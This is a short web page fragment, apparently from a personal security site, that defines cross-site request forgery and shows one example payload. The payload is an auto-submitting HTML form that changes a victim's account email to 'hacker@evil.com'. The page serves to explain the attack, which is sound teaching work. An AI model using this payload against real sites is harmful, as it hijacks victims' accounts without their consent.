XC
0MRADE
xc0mrade@root
Loading0%
CSRF allows malicious actors to exploit authenticated browser sessions, forcing target users to execute operations (such as emails changes or transfer transfers) without consent.
<form action="https://target.com/api/email" method="POST"><input name="email" value="hacker@evil.com" /></form><script>document.forms[0].submit()</script>